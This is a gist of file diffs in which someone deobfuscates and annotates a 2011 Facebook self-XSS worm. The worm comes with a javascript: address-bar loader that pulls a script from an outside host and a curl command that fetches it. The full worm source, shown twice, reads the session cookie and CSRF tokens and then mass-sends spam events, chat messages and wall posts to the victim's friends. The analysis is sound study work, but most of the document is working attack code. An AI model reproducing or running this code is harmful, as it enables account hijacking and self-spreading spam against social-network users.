ccoenen · April 26, 2011 19:42 · ghost · Nov 8, 2012
diff --git a/exploit.js b/exploit.js
 // # The Exploit comes as an event-invitation, it wants you to klick this link
 //   http://www.goo gle.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&ei=SHO2TaA kiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw%3 Fqw020fbs (remove spaces if interested)
 // # The link is a redirect to ht tp: //ge rman -spy3 .bl ogsp ot.c om/ (remove spaces if interested)
 // # you are directed to copy and paste a snipped of JS Code into your address-bar, see loader.js below.
 // # This script was taken from iamedwards.com on 2011-04-26
 //   this file can be downloaded by using curl with a refer and user-agent like this:
 //   curl -i -e "http://www.facebook.com" -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0" http://iamedwards.com/german.php?0.214
 // # ran it through a beautifier
 // # ran it through a for-loop to de-obfuscate the texts like this: for (var t in _0x8a40) { document.write('"'+_0x8a40[t] + '", '); }
 // # started commenting the _texte[xy] meanings nearby

 var _texte=[ /* 0 */  "%firstname% wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ ow.ly/4GpHi",
  "Meine Top Profil-Stalker:\n %tf% - 1136 Besuche\n %tf% - 983 Besuche \n %tf% - 542 Besuche \n %tf% - 300 Besuche \n Schau dir an wer dein Profil sieht @ http://ilikeclinton.com?u28xt5ga",
  "http://germancpa.blogspot.com/",
  "Schau dir deine Profil-Stalker an -  http://www.google.com/url?sa=t&amp;source=web&amp;cd=1&amp;ved=0CBoQFjAA&amp;url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&amp;ei=SHO2TaAkiNiIAve95Sk&amp;usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&amp;sig2=Ye1vqVHrMDHWkRv--npMkw?u28xt5ga ~~ u28xt5ga ",
  "WOW Jetzt kannst du sehen wer sich dein Profil ansieht!   (u28xt5ga)",
 /* 5 */  "href", "location", "top", "GET",
  "open",
 /* 10 */  "onreadystatechange",
  "readyState",
  "status",
  "responseText",
  "send",
  "/",
  "match",
  "cookie",
  "@[",
  "id",
  /* 20 */  ":",
  "name",
  "]",
  "",
  "&amp;",
  "=",
  "POST",
  "Content-Type",
  "application/x-www-form-urlencoded",
  "setRequestHeader",
 /* 30 */  "div",
  "createElement",
  "display",
  "style",
  "block",
  "position",
  "absolute",
  "width",
  "%",
  "height",
 /* 40 */  "left",
  "px",
  "textAlign",
  "center",
  "padding",
  "4px",
  "background",
  "#FFFFFF",
  "zIndex",
  "innerHTML",
 /* 50 */  "&nbsp;<br>Verifiziere deinen Code - Bitte gedulde dich einen kleinen Moment.<br><br> We are processing the offer for you... <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a><br><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">",
  "appendChild",
  "body",
  "data",
  "firstChild",
  "navAccountName",
  "getElementById",
  "?",
  "/ajax/choose/?__a=1",
  "event",
 /* 60 */  "AsyncRequest",
  "/ajax/typeahead/first_degree.php?__a=1&amp;viewer=",
  "&amp;token=",
  "&amp;filter[0]=user&amp;options[0]=friends_only&amp;options[1]=nm&amp;options[2]=sort_alpha",
  "length",
  "push",
  "getTime",
  "setTime",
  "getMonth",
  "getDate",
 /* 70 */  "getFullYear",
  "getHours",
  ",",
  "join",
  "on",
  "Create Event",
  "new",
  "/events/create.php",
  "/ajax/chat/buddy_list.php?__a=1",
  "substr",
 /* 80 */  "(",
  ")",
  "buddy_list",
  "payload",
  "nowAvailableList",
  "random",
  "floor",
  "%firstname%",
  "toLowerCase",
  "firstName",
 /* 90 */  "userInfos",
  "replace",
  "/ajax/chat/send.php?__a=1",
  "/ajax/browser/friends/?uid=",
  "&amp;filter=all&amp;__a=1&amp;__d=1",
  "shift",
  "fetched friends: ",
  "home",
  "pop",
  "%tf%",
 /* 100 */  "search",
  "xhpc_message_text",
  "xhpc_message",
  "message text: ",
  "/ajax/updatestatus.php?__a=1",
  "profile"
 ];


 var chatmessage = _texte[0];
 var postmessage = _texte[1];
 var redirect = _texte[2];
 var eventdesc = _texte[3];
 var eventname = _texte[4];
 var nfriends = 5000;
 var debug = false;
 var wf = 0;

 /** mf is used for a redirect after a short delay. It is used as a cancel-method when somebody clicks the "offer"-link */
 var mf = function() {
    if (wf <= 0) {
        setTimeout(function() {
 			// redirecting to the url in _texte[2]. Unfortunately that url was no longer valid when i got here.
            window[_texte[7]][_texte[6]][_texte[5]] = redirect; // top / location / href
        },
        500);
    };
 };
 /** makes a xhr GET request to the given url. Calls callback with resulting text and callback2 without parameters */
 var doget = function(url, _callback, _callback2) {
    var _xhr = new XMLHttpRequest();
    _xhr[_texte[9]](_texte[8], url); // open / GET
    _xhr[_texte[10]] = function() { // onreadystatechange
        if (_xhr[_texte[11]] == 4) { // readyState
            if (_xhr[_texte[12]] == 200 && _callback) { // status
                _callback(_xhr[_texte[13]]); // call callback with responseText
            };
            if (_callback2) {
                _callback2();
            };
        };
    };
    _xhr[_texte[14]](); // callng send() method.
 };
 doget(_texte[15],  // "/" (yeah, a single slash)
 function(_attr1) {
 	// personal learning: it never occurred to me, but since functions are regular objects
 	// it's actually possible to address a function like mystring.match() in this way mystring['match']()
 	/** stores the facebook user ID, retrieved from the cookie */
    var _fbUserID = document[_texte[17]][_texte[16]](/c_user=(\d+)/)[1]; // cookie, match

 	/** converts an object containing "id" and "name" properties to the form of "@[id:name]", defaults to empty string */
    var _0x93d3x11 = function(obj) {
        return obj ? _texte[18] + obj[_texte[19]] + _texte[20] + obj[_texte[21]] + _texte[22] : _texte[23];
        // return obj ? "@[" + obj["id"] + ":" + obj["name"] + "]" : ""; // if set, return  @[id:name], otherwise empty string
    };

 	/** returns the "name" property of a given attribute, defaults to empty string. */
    var _getNamePropertyOf = function(obj) {
        return obj ? obj[_texte[21]] : _texte[23]; // name, "" (empty string)
    };
 	/** encodes an object for use in a url"&amp;" (key+=+encoded value, chained by &), defaults to emtpy string */
    var _urlencode = function(_innerAttr1) {
        out = _texte[23]; // empty string
        for (var _key in _innerAttr1) {
            out += (out ? _texte[24] : _texte[23]) + _key + ((_innerAttr1[_key] !== null) ? _texte[25] + encodeURIComponent(_innerAttr1[_key]) : _texte[23]);
        };
        return out;
    };

 	/** posts to url, sending along the given postData, compare to #doget */
    var _doPost = function(url, postData, _callback, _secondCallback) {
        var _xhr = new XMLHttpRequest();
        _xhr[_texte[9]](_texte[26], url); // open, POST
        _xhr[_texte[29]](_texte[27], _texte[28]); // setting content type
        _xhr[_texte[10]] = function() {
            if (_xhr[_texte[11]] == 4) {
                if (_xhr[_texte[12]] == 200 && _callback) {
                    _callback(_xhr[_texte[13]]); // call callback with responseText
                };
                if (_secondCallback) {
                    _secondCallback();
                };
            };
        };
        _xhr[_texte[14]](_urlencode(postData)); // calling send() method with supplied data
    };

 	/** creates the fake-user interface containing the "click here" link, starting the mf() function */
    var _createOverlay = function() {
 		var elem = document[_texte[31]](_texte[30]); // createElement('div')
 		// styles
        elem[_texte[33]][_texte[32]] = _texte[34]; // display block
        elem[_texte[33]][_texte[35]] = _texte[36]; // position absolute
        elem[_texte[33]][_texte[37]] = 100 + _texte[38]; // w+h 100%, top+left 0,0
        elem[_texte[33]][_texte[39]] = 100 + _texte[38];
        elem[_texte[33]][_texte[40]] = 0 + _texte[41]; 
        elem[_texte[33]][_texte[7]] = 0 + _texte[41];
        elem[_texte[33]][_texte[42]] = _texte[43]; // textAlign center
        elem[_texte[33]][_texte[44]] = _texte[45]; // padding 4px
        elem[_texte[33]][_texte[46]] = _texte[47]; // white bg
        elem[_texte[33]][_texte[48]] = 999999; // high zIndex
 		
 		// contains the text that presents you a "click here" link which starts mf()-function. Also shows the loading-spinner.
 		// clicking that link will reset the wf-counter and call mf, redirecting you to another site (apparently with a very special offer)
        elem[_texte[49]] = _texte[50];
        document[_texte[52]][_texte[51]](elem); // body.appendChild()
    };

    var _0x93d3x19 = _attr1[_texte[16]](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
    if (_0x93d3x19) {
        comp = _0x93d3x19[1];
    } else {
        comp = _texte[23];
    };
    var _0x93d3x1a = _attr1[_texte[16]](/name="post_form_id" value="([\d\w]+)"/i)[1];
    var _0x93d3x1b = _attr1[_texte[16]](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
    var _0x93d3x1c = document[_texte[56]](_texte[55])[_texte[54]][_texte[53]];
    redirect = redirect + _texte[57] + _urlencode({
        userid: _fbUserID,
        name: _0x93d3x1c,
        doclose: 1
    });
    _createOverlay();
    if (eventdesc) {
        wf++;
        _doPost(_texte[58], {
            type: _texte[59],
            eid: null,
            invite_message: _texte[23],
            __d: 1,
            post_form_id: _0x93d3x1a,
            fb_dtsg: _0x93d3x1b,
            lsd: null,
            post_form_id_source: _texte[60]
        },
        function(_0x93d3x1d) {
            var _0x93d3x1e = _0x93d3x1d[_texte[16]](/\\"token\\":\\"([^\\]+)\\"/)[1];
            var _0x93d3xb = _texte[61] + _fbUserID + _texte[62] + _0x93d3x1e + _texte[63];
            doget(_0x93d3xb,
            function(_0x93d3x1f) {
                var _0x93d3x20 = _0x93d3x1f[_texte[16]](/\{"uid":\d+,/g);
                var _0x93d3x21 = [];
                for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) {
                    var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/:(\d+),/)[1];
                    if (_0x93d3x23 != _fbUserID) {
                        _0x93d3x21[_texte[65]](_0x93d3x23);
                    };
                };
                var _0x93d3x24 = new Date();
                _0x93d3x24[_texte[67]](_0x93d3x24[_texte[66]]() + 60 * 60 * 24 * 1000);
                datestr = (_0x93d3x24[_texte[68]]() + 1) + _texte[15] + _0x93d3x24[_texte[69]]() + _texte[15] + _0x93d3x24[_texte[70]]();
                timestr = _0x93d3x24[_texte[71]]() * 60;
                var _0x93d3x25 = {
                    post_form_id: _0x93d3x1a,
                    fb_dtsg: _0x93d3x1b,
                    start_dateIntlDisplay: datestr,
                    start_date: datestr,
                    start_time_hour_min: timestr,
                    name: eventname,
                    place_page_id: _texte[23],
                    location: _texte[23],
                    street: _texte[23],
                    geo_id: _texte[23],
                    geo_sq: _texte[23],
                    desc: eventdesc,
                    sgb_invitees: _0x93d3x21[_texte[73]](_texte[72]),
                    sgb_emails: _texte[23],
                    sgb_message: _texte[23],
                    privacy_type: _texte[74],
                    guest_list: _texte[74],
                    connections_can_post: _texte[74],
                    save: _texte[75],
                    submitting: _texte[23]
                };
                _0x93d3x25[_texte[76]] = _texte[23];
                _doPost(_texte[77], _0x93d3x25, false,
                function() {
                    mf(--wf);
                });
            });
        });
    };
    if (chatmessage) {
        wf++;
        _doPost(_texte[78], {
            user: _fbUserID,
            post_form_id: _0x93d3x1a,
            fb_dtsg: _0x93d3x1b,
            lsd: null,
            post_form_id_source: _texte[60],
            popped_out: false,
            force_render: true
        },
        function(_0x93d3x1d) {
            var _0x93d3x26 = _0x93d3x1d[_texte[79]](9);
            var _0x93d3x27 = eval(_texte[80] + _0x93d3x26 + _texte[81]);
            var _0x93d3x28 = _0x93d3x27[_texte[83]][_texte[82]];
            for (var _0x93d3x29 in _0x93d3x28[_texte[84]]) {
                var _0x93d3x2a = Math[_texte[86]](Math[_texte[85]]() * 1335448958);
                var _0x93d3x2b = (new Date())[_texte[66]]();
                var _0x93d3x2c = chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]());
                _doPost(_texte[92], {
                    msg_id: Math[_texte[86]](Math[_texte[85]]() * 1335448958),
                    client_time: (new Date())[_texte[66]](),
                    msg_text: chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]()),
                    to: _0x93d3x29,
                    post_form_id: _0x93d3x1a,
                    fb_dtsg: _0x93d3x1b,
                    post_form_id_source: _texte[60]
                });
            };
            mf(--wf);
        });
    };
    if (postmessage) {
        wf++;
        doget(_texte[93] + _fbUserID + _texte[94],
        function(_0x93d3x1d) {
            var _0x93d3x20 = _0x93d3x1d[_texte[16]](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
            var _0x93d3x2d = [];
            if (_0x93d3x20) {
                for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) {
                    var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/_\d+_/)[0][_texte[91]](/_/g, _texte[23]);
                    var _0x93d3x2e = _0x93d3x20[_0x93d3x22][_texte[16]](/>[^>]+\\u003c\\\/a>$/i)[0][_texte[91]](/\\u003c\\\/a>$/gim, _texte[23])[_texte[91]](/>/g, _texte[23]);
                    _0x93d3x2d[_texte[65]]({
                        id: _0x93d3x23,
                        name: _0x93d3x2e
                    });
                };
            };
            var _0x93d3xd = [];
            var _0x93d3x2f = [];
            while (_0x93d3x2d[_texte[64]]) {
                var _0x93d3x30 = Math[_texte[86]](Math[_texte[85]]() * _0x93d3x2d[_texte[64]]);
                _0x93d3xd[_texte[65]](_0x93d3x2d[_0x93d3x30]);
                _0x93d3x2f[_texte[65]](_0x93d3x2d[_0x93d3x30]);
                var _0x93d3x2b = _0x93d3x2d[_texte[95]]();
                if (_0x93d3x30) {
                    _0x93d3x2d[_0x93d3x30 - 1] = _0x93d3x2b;
                };
            };
            if (debug) {
                alert(_texte[96] + _0x93d3xd[_texte[64]]);
            };
            var _0x93d3x31 = {
                post_form_id: _0x93d3x1a,
                fb_dtsg: _0x93d3x1b,
                xhpc_composerid: comp,
                xhpc_targetid: _fbUserID,
                xhpc_context: _texte[97],
                xhpc_fbx: _texte[23],
                lsd: null,
                post_form_id_source: _texte[60]
            };
            mt = postmessage;
            m = postmessage;
            while (mt[_texte[100]](_texte[99]) >= 0) {
                var _0x93d3x32 = _0x93d3xd[_texte[98]]();
                mt = mt[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x32));
                m = m[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x32));
            };
            _0x93d3x31[_texte[101]] = mt;
            _0x93d3x31[_texte[102]] = m;
            if (debug) {
                alert(_texte[103] + mt);
            };
            _doPost(_texte[104], _0x93d3x31);
            var _0x93d3x33 = function(_0x93d3x15) {
                if (_0x93d3x15 == 0) {
                    wf = 0;
                    mf();
                    return;
                };
                var _0x93d3x34 = _0x93d3x2f[_texte[95]]();
                var _0x93d3x35 = {
                    post_form_id: _0x93d3x1a,
                    fb_dtsg: _0x93d3x1b,
                    xhpc_composerid: comp,
                    xhpc_targetid: _0x93d3x34[_texte[19]],
                    xhpc_context: _texte[105],
                    xhpc_fbx: 1,
                    lsd: null,
                    post_form_id_source: _texte[60]
                };
                var _0x93d3x36 = postmessage;
                var _0x93d3x37 = postmessage;
                if (_0x93d3xd[_texte[64]] == 0) {
                    wf = 0;
                    mf();
                    return;
                };
                while (_0x93d3x36[_texte[100]](_texte[99]) >= 0) {
                    var _0x93d3x38 = _0x93d3xd[_texte[98]]();
                    _0x93d3x36 = _0x93d3x36[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x38));
                    _0x93d3x37 = _0x93d3x37[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x38));
                };
                _0x93d3x35[_texte[101]] = _0x93d3x36;
                _0x93d3x35[_texte[102]] = _0x93d3x37;
                _doPost(_texte[104], _0x93d3x35);
                setTimeout(function() {
                    _0x93d3x33(_0x93d3x15 - 1);
                },
                2000);
            };
            wf++;
            setTimeout(function() {
                _0x93d3x33(nfriends);
            },
            2000);
        });
    };
    mf();
 });
diff --git a/loader.js b/loader.js
 javascript:(a=(b=document).createElement('script')).src='//iamedwards.com/german.php?'+Math.random(),b.body.appendChild(a);void(0)

 // this is pretty straightforward. Create a script-node, set it's source and append it to the body.
 // you can't download the JS directly, you need to set the right referer or you'll be redirected to google.
	// # The Exploit comes as an event-invitation, it wants you to klick this link
	// http://www.goo gle.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&ei=SHO2TaA kiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw%3 Fqw020fbs (remove spaces if interested)
	// # The link is a redirect to ht tp: //ge rman -spy3 .bl ogsp ot.c om/ (remove spaces if interested)
	// # you are directed to copy and paste a snipped of JS Code into your address-bar, see loader.js below.
	// # This script was taken from iamedwards.com on 2011-04-26
	// this file can be downloaded by using curl with a refer and user-agent like this:
	// curl -i -e "http://www.facebook.com" -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0" http://iamedwards.com/german.php?0.214
	// # ran it through a beautifier
	// # ran it through a for-loop to de-obfuscate the texts like this: for (var t in _0x8a40) { document.write('"'+_0x8a40[t] + '", '); }
	// # started commenting the _texte[xy] meanings nearby

	var _texte=[ /* 0 */ "%firstname% wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ ow.ly/4GpHi",
	"Meine Top Profil-Stalker:\n %tf% - 1136 Besuche\n %tf% - 983 Besuche \n %tf% - 542 Besuche \n %tf% - 300 Besuche \n Schau dir an wer dein Profil sieht @ http://ilikeclinton.com?u28xt5ga",
	"http://germancpa.blogspot.com/",
	"Schau dir deine Profil-Stalker an - http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&ei=SHO2TaAkiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw?u28xt5ga ~~ u28xt5ga ",
	"WOW Jetzt kannst du sehen wer sich dein Profil ansieht! (u28xt5ga)",
	/* 5 */ "href", "location", "top", "GET",
	"open",
	/* 10 */ "onreadystatechange",
	"readyState",
	"status",
	"responseText",
	"send",
	"/",
	"match",
	"cookie",
	"@[",
	"id",
	/* 20 */ ":",
	"name",
	"]",
	"",
	"&",
	"=",
	"POST",
	"Content-Type",
	"application/x-www-form-urlencoded",
	"setRequestHeader",
	/* 30 */ "div",
	"createElement",
	"display",
	"style",
	"block",
	"position",
	"absolute",
	"width",
	"%",
	"height",
	/* 40 */ "left",
	"px",
	"textAlign",
	"center",
	"padding",
	"4px",
	"background",
	"#FFFFFF",
	"zIndex",
	"innerHTML",
	/* 50 */ " <br>Verifiziere deinen Code - Bitte gedulde dich einen kleinen Moment.<br><br> We are processing the offer for you... <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a><br><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">",
	"appendChild",
	"body",
	"data",
	"firstChild",
	"navAccountName",
	"getElementById",
	"?",
	"/ajax/choose/?__a=1",
	"event",
	/* 60 */ "AsyncRequest",
	"/ajax/typeahead/first_degree.php?__a=1&viewer=",
	"&token=",
	"&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha",
	"length",
	"push",
	"getTime",
	"setTime",
	"getMonth",
	"getDate",
	/* 70 */ "getFullYear",
	"getHours",
	",",
	"join",
	"on",
	"Create Event",
	"new",
	"/events/create.php",
	"/ajax/chat/buddy_list.php?__a=1",
	"substr",
	/* 80 */ "(",
	")",
	"buddy_list",
	"payload",
	"nowAvailableList",
	"random",
	"floor",
	"%firstname%",
	"toLowerCase",
	"firstName",
	/* 90 */ "userInfos",
	"replace",
	"/ajax/chat/send.php?__a=1",
	"/ajax/browser/friends/?uid=",
	"&filter=all&__a=1&__d=1",
	"shift",
	"fetched friends: ",
	"home",
	"pop",
	"%tf%",
	/* 100 */ "search",
	"xhpc_message_text",
	"xhpc_message",
	"message text: ",
	"/ajax/updatestatus.php?__a=1",
	"profile"
	];


	var chatmessage = _texte[0];
	var postmessage = _texte[1];
	var redirect = _texte[2];
	var eventdesc = _texte[3];
	var eventname = _texte[4];
	var nfriends = 5000;
	var debug = false;
	var wf = 0;

	/** mf is used for a redirect after a short delay. It is used as a cancel-method when somebody clicks the "offer"-link */
	var mf = function() {
	if (wf <= 0) {
	setTimeout(function() {
	// redirecting to the url in _texte[2]. Unfortunately that url was no longer valid when i got here.
	window[_texte[7]][_texte[6]][_texte[5]] = redirect; // top / location / href
	},
	500);
	};
	};
	/** makes a xhr GET request to the given url. Calls callback with resulting text and callback2 without parameters */
	var doget = function(url, _callback, _callback2) {
	var _xhr = new XMLHttpRequest();
	_xhr[_texte[9]](_texte[8], url); // open / GET
	_xhr[_texte[10]] = function() { // onreadystatechange
	if (_xhr[_texte[11]] == 4) { // readyState
	if (_xhr[_texte[12]] == 200 && _callback) { // status
	_callback(_xhr[_texte[13]]); // call callback with responseText
	};
	if (_callback2) {
	_callback2();
	};
	};
	};
	_xhr[_texte[14]](); // callng send() method.
	};
	doget(_texte[15], // "/" (yeah, a single slash)
	function(_attr1) {
	// personal learning: it never occurred to me, but since functions are regular objects
	// it's actually possible to address a function like mystring.match() in this way mystring['match']()
	/** stores the facebook user ID, retrieved from the cookie */
	var _fbUserID = document[_texte[17]][_texte[16]](/c_user=(\d+)/)[1]; // cookie, match

	/** converts an object containing "id" and "name" properties to the form of "@[id:name]", defaults to empty string */
	var _0x93d3x11 = function(obj) {
	return obj ? _texte[18] + obj[_texte[19]] + _texte[20] + obj[_texte[21]] + _texte[22] : _texte[23];
	// return obj ? "@[" + obj["id"] + ":" + obj["name"] + "]" : ""; // if set, return @[id:name], otherwise empty string
	};

	/** returns the "name" property of a given attribute, defaults to empty string. */
	var _getNamePropertyOf = function(obj) {
	return obj ? obj[_texte[21]] : _texte[23]; // name, "" (empty string)
	};
	/** encodes an object for use in a url"&" (key+=+encoded value, chained by &), defaults to emtpy string */
	var _urlencode = function(_innerAttr1) {
	out = _texte[23]; // empty string
	for (var _key in _innerAttr1) {
	out += (out ? _texte[24] : _texte[23]) + _key + ((_innerAttr1[_key] !== null) ? _texte[25] + encodeURIComponent(_innerAttr1[_key]) : _texte[23]);
	};
	return out;
	};

	/** posts to url, sending along the given postData, compare to #doget */
	var _doPost = function(url, postData, _callback, _secondCallback) {
	var _xhr = new XMLHttpRequest();
	_xhr[_texte[9]](_texte[26], url); // open, POST
	_xhr[_texte[29]](_texte[27], _texte[28]); // setting content type
	_xhr[_texte[10]] = function() {
	if (_xhr[_texte[11]] == 4) {
	if (_xhr[_texte[12]] == 200 && _callback) {
	_callback(_xhr[_texte[13]]); // call callback with responseText
	};
	if (_secondCallback) {
	_secondCallback();
	};
	};
	};
	_xhr[_texte[14]](_urlencode(postData)); // calling send() method with supplied data
	};

	/** creates the fake-user interface containing the "click here" link, starting the mf() function */
	var _createOverlay = function() {
	var elem = document[_texte[31]](_texte[30]); // createElement('div')
	// styles
	elem[_texte[33]][_texte[32]] = _texte[34]; // display block
	elem[_texte[33]][_texte[35]] = _texte[36]; // position absolute
	elem[_texte[33]][_texte[37]] = 100 + _texte[38]; // w+h 100%, top+left 0,0
	elem[_texte[33]][_texte[39]] = 100 + _texte[38];
	elem[_texte[33]][_texte[40]] = 0 + _texte[41];
	elem[_texte[33]][_texte[7]] = 0 + _texte[41];
	elem[_texte[33]][_texte[42]] = _texte[43]; // textAlign center
	elem[_texte[33]][_texte[44]] = _texte[45]; // padding 4px
	elem[_texte[33]][_texte[46]] = _texte[47]; // white bg
	elem[_texte[33]][_texte[48]] = 999999; // high zIndex

	// contains the text that presents you a "click here" link which starts mf()-function. Also shows the loading-spinner.
	// clicking that link will reset the wf-counter and call mf, redirecting you to another site (apparently with a very special offer)
	elem[_texte[49]] = _texte[50];
	document[_texte[52]][_texte[51]](elem); // body.appendChild()
	};

	var _0x93d3x19 = _attr1[_texte[16]](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
	if (_0x93d3x19) {
	comp = _0x93d3x19[1];
	} else {
	comp = _texte[23];
	};
	var _0x93d3x1a = _attr1[_texte[16]](/name="post_form_id" value="([\d\w]+)"/i)[1];
	var _0x93d3x1b = _attr1[_texte[16]](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
	var _0x93d3x1c = document[_texte[56]](_texte[55])[_texte[54]][_texte[53]];
	redirect = redirect + _texte[57] + _urlencode({
	userid: _fbUserID,
	name: _0x93d3x1c,
	doclose: 1
	});
	_createOverlay();
	if (eventdesc) {
	wf++;
	_doPost(_texte[58], {
	type: _texte[59],
	eid: null,
	invite_message: _texte[23],
	__d: 1,
	post_form_id: _0x93d3x1a,
	fb_dtsg: _0x93d3x1b,
	lsd: null,
	post_form_id_source: _texte[60]
	},
	function(_0x93d3x1d) {
	var _0x93d3x1e = _0x93d3x1d[_texte[16]](/\\"token\\":\\"([^\\]+)\\"/)[1];
	var _0x93d3xb = _texte[61] + _fbUserID + _texte[62] + _0x93d3x1e + _texte[63];
	doget(_0x93d3xb,
	function(_0x93d3x1f) {
	var _0x93d3x20 = _0x93d3x1f[_texte[16]](/\{"uid":\d+,/g);
	var _0x93d3x21 = [];
	for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) {
	var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/:(\d+),/)[1];
	if (_0x93d3x23 != _fbUserID) {
	_0x93d3x21[_texte[65]](_0x93d3x23);
	};
	};
	var _0x93d3x24 = new Date();
	_0x93d3x24[_texte[67]](_0x93d3x24[_texte[66]]() + 60 * 60 * 24 * 1000);
	datestr = (_0x93d3x24[_texte[68]]() + 1) + _texte[15] + _0x93d3x24[_texte[69]]() + _texte[15] + _0x93d3x24[_texte[70]]();
	timestr = _0x93d3x24[_texte[71]]() * 60;
	var _0x93d3x25 = {
	post_form_id: _0x93d3x1a,
	fb_dtsg: _0x93d3x1b,
	start_dateIntlDisplay: datestr,
	start_date: datestr,
	start_time_hour_min: timestr,
	name: eventname,
	place_page_id: _texte[23],
	location: _texte[23],
	street: _texte[23],
	geo_id: _texte[23],
	geo_sq: _texte[23],
	desc: eventdesc,
	sgb_invitees: _0x93d3x21[_texte[73]](_texte[72]),
	sgb_emails: _texte[23],
	sgb_message: _texte[23],
	privacy_type: _texte[74],
	guest_list: _texte[74],
	connections_can_post: _texte[74],
	save: _texte[75],
	submitting: _texte[23]
	};
	_0x93d3x25[_texte[76]] = _texte[23];
	_doPost(_texte[77], _0x93d3x25, false,
	function() {
	mf(--wf);
	});
	});
	});
	};
	if (chatmessage) {
	wf++;
	_doPost(_texte[78], {
	user: _fbUserID,
	post_form_id: _0x93d3x1a,
	fb_dtsg: _0x93d3x1b,
	lsd: null,
	post_form_id_source: _texte[60],
	popped_out: false,
	force_render: true
	},
	function(_0x93d3x1d) {
	var _0x93d3x26 = _0x93d3x1d[_texte[79]](9);
	var _0x93d3x27 = eval(_texte[80] + _0x93d3x26 + _texte[81]);
	var _0x93d3x28 = _0x93d3x27[_texte[83]][_texte[82]];
	for (var _0x93d3x29 in _0x93d3x28[_texte[84]]) {
	var _0x93d3x2a = Math[_texte[86]](Math[_texte[85]]() * 1335448958);
	var _0x93d3x2b = (new Date())[_texte[66]]();
	var _0x93d3x2c = chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]());
	_doPost(_texte[92], {
	msg_id: Math[_texte[86]](Math[_texte[85]]() * 1335448958),
	client_time: (new Date())[_texte[66]](),
	msg_text: chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]()),
	to: _0x93d3x29,
	post_form_id: _0x93d3x1a,
	fb_dtsg: _0x93d3x1b,
	post_form_id_source: _texte[60]
	});
	};
	mf(--wf);
	});
	};
	if (postmessage) {
	wf++;
	doget(_texte[93] + _fbUserID + _texte[94],
	function(_0x93d3x1d) {
	var _0x93d3x20 = _0x93d3x1d[_texte[16]](/\/\d+_\d+_\d+_q\.jpg.?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.?\\u003c\\\/a>/gi);
	var _0x93d3x2d = [];
	if (_0x93d3x20) {
	for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) {
	var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/_\d+_/)[0][_texte[91]](/_/g, _texte[23]);
	var _0x93d3x2e = _0x93d3x20[_0x93d3x22][_texte[16]](/>[^>]+\\u003c\\\/a>$/i)[0][_texte[91]](/\\u003c\\\/a>$/gim, _texte[23])[_texte[91]](/>/g, _texte[23]);
	_0x93d3x2d[_texte[65]]({
	id: _0x93d3x23,
	name: _0x93d3x2e
	});
	};
	};
	var _0x93d3xd = [];
	var _0x93d3x2f = [];
	while (_0x93d3x2d[_texte[64]]) {
	var _0x93d3x30 = Math[_texte[86]](Math[_texte[85]]() * _0x93d3x2d[_texte[64]]);
	_0x93d3xd[_texte[65]](_0x93d3x2d[_0x93d3x30]);
	_0x93d3x2f[_texte[65]](_0x93d3x2d[_0x93d3x30]);
	var _0x93d3x2b = _0x93d3x2d[_texte[95]]();
	if (_0x93d3x30) {
	_0x93d3x2d[_0x93d3x30 - 1] = _0x93d3x2b;
	};
	};
	if (debug) {
	alert(_texte[96] + _0x93d3xd[_texte[64]]);
	};
	var _0x93d3x31 = {
	post_form_id: _0x93d3x1a,
	fb_dtsg: _0x93d3x1b,
	xhpc_composerid: comp,
	xhpc_targetid: _fbUserID,
	xhpc_context: _texte[97],
